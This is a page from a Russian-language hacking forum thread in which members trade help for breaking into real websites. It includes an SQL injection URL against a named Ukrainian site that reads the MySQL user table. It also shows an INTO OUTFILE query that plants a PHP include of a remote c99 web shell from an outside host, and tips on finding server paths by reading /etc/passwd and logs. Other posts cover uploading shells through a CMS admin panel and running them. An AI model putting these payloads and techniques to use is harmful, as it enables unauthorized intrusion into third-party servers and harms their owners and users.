Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    а никто тебе конкретно не даст...а приват палить никто не будет (если он есть)..
     
  2. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5
    Вот нашел, в метасплойт есть, попробуем! )
     
  3. [R]eD

    [R]eD Elder - Старейшина

    Joined:
    1 Aug 2006
    Messages:
    72
    Likes Received:
    1
    Reputations:
    0
    Залил шелл через админку кмс (засунул шелл в шаблон)

    захожу на него все ок - шелл полностью работает.

    дальше заливаю шелл отдельно от шаблона, файл залился

    НО, при заходе на него вылазит ошибка 500 ( Premature end of script headers: в error.log ) и так на все новые залитые .php файлы, если залить .txt все ок (пробывал чтобы пхп обрабатывал тхт как скрипт, проблема остается). Пробывал менять chmod (0777/0755/0700) результата 0.

    т.е. править скрипты можно, но заливать скрипты чтобы они выполнялись нет.

    дело явно не в содержании шелла, если вписать 123 и назвать файл asd.php он всеравно выдаст ошибку.

    все остальные файлы в директории (которые были до меня) выполняются отлично, если отредактировать один из такхи файлов то тоже все работает, но нужно именно залить отдельно шелл.

    safe mode выключен, все папки открыты на запись, вобщем свиду все нормально...

    система freebsd

    помогите, не знаю что и думать :(
     
    #16343 [R]eD, 12 Mar 2011
    Last edited: 12 Mar 2011
  4. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    .htaccess
     
  5. [R]eD

    [R]eD Elder - Старейшина

    Joined:
    1 Aug 2006
    Messages:
    72
    Likes Received:
    1
    Reputations:
    0
    В .htaccess ничего нету кроме AddDeafultCharset UTF-8

    // мда.. сломал сайт вобщем, подожду пока админы поправят чтобы еще попробывать что-нибудь...
     
    #16345 [R]eD, 12 Mar 2011
    Last edited: 12 Mar 2011
  6. asql

    asql New Member

    Joined:
    19 Feb 2011
    Messages:
    32
    Likes Received:
    0
    Reputations:
    -3
    подскажите, как вывести file_priv?
    пробую
    http://www.newhorizons.com.ua/news_detail.php?id=-100+union+select+1,2,file_priv,4,5,6,7,8+from+mysql.user+where+user=0x755f6e6577686f72697a6f6e--
    никак не получаетса
     
  7. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    с чего ты решил что у тебя доступ к ней?
    http://www.newhorizons.com.ua/news_detail.php?id=-100+union+select+1,2,3,4,5,6,7,8+from+mysql.user--+
     
    1 person likes this.
  8. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    13
    Reputations:
    5
    как узнать полный путь от сервера к сайту ? есть доступ к pma
     
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    почти всегда есть файл phpinfo.php в корневой директории пма (если админ не удалил,то оно там лежит по дефолту)

    http://site.com/phpmyadmin/phpinfo.php
     
    _________________________
    #16349 Konqi, 12 Mar 2011
    Last edited: 12 Mar 2011
  10. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    13
    Reputations:
    5
    увы, такого не имеется( а точней выбивает белую страницу пустую
     
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    нужно быть авторизованным в ПМА, для заглядывания пхпинфо
     
    _________________________
  12. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    13
    Reputations:
    5
    я авторизован, всеравно белая страница
     
  13. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    какая там версия ПМА ? пробуйте раскрытие путей из этой темы

    http://forum.antichat.net/thread50669.html

    если есть привилегии чтения/запись файлов для твоего пользователя mysql, пробуй читать лог файлы
     
    _________________________
    1 person likes this.
  14. Compton

    Compton Member

    Joined:
    31 Jan 2010
    Messages:
    290
    Likes Received:
    25
    Reputations:
    0
    почти такой же вопрос. как узнать путь для заливки шелла (/home/www/img/shell.php),если ошибки в основном вида
    Code:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' LIMIT 10000' at line 1
    . Права file_priv есть
     
    #16354 Compton, 12 Mar 2011
    Last edited: 12 Mar 2011
  15. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    13
    Reputations:
    5
    Версия MySQL-клиента: 5.0.51a
    при раскрытии любых указаных путей в той теме отображается пустая страница даже без ошибки

    сайт с инклудом ../../../../var/www/default/mysql_data.php
    пробовал SELECT '<? @include("http://xxx.ru/c99.txt"); ?>' into outfile '/var/www/tmp/c99.php'
     
  16. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    13
    Reputations:
    5
    в /tmp/ сразу залил

    и еще один тупой впорос как теперь сам шелл юзануть?
     
  17. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5
    kemtipp.ru ломаешь?
     
  18. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Несколько вариантов:
    1) Просканить сканером директорий с целью найти phpinfo или файл который открыть по прямому пути выдает ошибку.
    2) Вставить спецсимволы в сесии\куки в надежде, что они не проверяються и ошибки не выключены. Выведет ошибку с путем.
    3) Раз уж есть file_priv, то читайте /etc/passwd. Найти там путь возможно. Или найти access_log (error_log), там тоже могут быть пути, и если пути такого плана: /usr/sitename.ru/www то просто вставить вместо sitename.ru доменное имя уязвимого сайта. Или опять же проскать через load_file в поисках httpd.conf, там есть деректива, в которой указан путь обычно или виртуальный хост хотя бы.
    4) Поиск вывода ошибок на соседних сайтах найденных через Reverse IP. Если путь вида, в котором учавствует доменное имя, то включаем логику ;) Если же путь типа /usr/user100500/www то пробовать по-другому найти.
    Но раз уж есть file_priv, то через /etc/passwd возможно найти путь ;)
     
  19. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    13
    Reputations:
    5
    я не вандал, только в учебных целях)

    залил я шелл таким образом SELECT '<? @include("http://xxx.ru/c99.txt"); ?>' into outfile '/tmp/c99.php'

    как теперь в него зайти
     
  20. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Либо искать локальный инклуд, либо найти папку с правами, доступную из-под веба.
     
    1 person likes this.
Thread Status:
Not open for further replies.